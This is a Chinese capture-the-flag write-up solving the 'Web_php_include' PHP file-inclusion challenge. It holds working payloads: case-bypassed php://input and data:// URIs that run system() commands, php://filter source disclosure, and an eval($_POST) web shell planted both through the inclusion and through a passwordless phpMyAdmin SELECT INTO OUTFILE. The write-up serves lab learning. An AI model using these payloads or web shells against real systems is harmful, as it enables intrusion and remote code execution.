Web_php_include
思路
审计代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
$page=str_replace("php://", "", $page);
}
include($page);
?>
可以看到这里直接include($page),$page参数我们可以进行控制,并且用的是str_replace()函数进行过滤,当匹配到php://时就把该部分替换为空,我们可以用别的协议进行绕过,也可大小写
注意这里有个while循环,故单纯的用phphp://p://是无法进行绕过的
思路一
利用php://input协议
虽然过滤了php://,但是我们可以通过大小写绕过
构造payload
?page=Php://input
POST_DATA:<?php system('ls') ?>
然后得到目录
再在
POST_DATA:<?php system('cat fl4gisisish3r3.php'); ?>
得到flag
这里如果利用hackbar,可能post包会交不上去,也不知道为啥,在执行cat文件时,flag并不会显示在页面上,要查看源代码才能看到,这是为啥,也不清楚。。
思路二
利用data协议
构造payload
?page=data://text/plain,<?php system('ls'); ?>
?page=data://text/plain,<?php system('cat fl4gisisish3r3.php'); ?>
这里直接在url上执行,用bp的时候不知道为什么执行不了,但是换个编码就行了,不知道为啥,一脑迷
在bp上执行不了的原因是空格要进行url编码,用+或者%20代替空格才可以执行,类似的还有如果cd%20%26%26ls,%26表示&,如果直接输入&也会执行不了。
所以在bp中构造
?page=data://text/plain,<?php+system('cat%20fl4gisisish3r3.php')%20?>
当我们用&时,%26代替
?page=data://text/plain,<?php+system('cat%20phpinfo.php%26%26cat+fl4gisisish3r3.php')%20?>
也可以直接用data协议挂马
?page=data://text/plain,%3C?php%20@eval($_POST[%27hacker%27]);%20?%3E
直接往蚁剑上粘贴
http://220.249.52.133:53841/?page=data://text/plain,%3C?php%20@eval($_POST[%27hacker%27]);%20?%3E
密码hacker,就连上了后台
思路三
?page=Php://filter/read=convert.base64-encode/resource=fl4gisisish3r3.php
再base64解码下
思路四
用dirsearch扫一下,发现有phpmyadmin文件
进去之后,账号root,密码为空(可能默认这样)
然后在sql语句中执行
show variables like "secure_file_priv"
- 当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
- 当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
- 当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制
查询为空,说明可以导入和导出文件
执行
select "<?php @eval($_POST['hacker']); ?>" into outfile '/tmp/hacker.php'
注意 select 后面的要写入的文件内容是用双引号引起的,因为如果用单引号的话会与'hacker'中的单引号进行闭合导致报错,在sql语句中还是尽量使用双引号。
便可在/tmp下找到小马,Linux下一般/tmp文间夹下允许导入文件,如果换成其他文件夹就会报错,然后蚁剑连接。
http://220.249.52.133:39182/?page=/tmp/hacker.php
上述特舒情况,用php://input最好用bp,用data协议就直接在url上输入就行
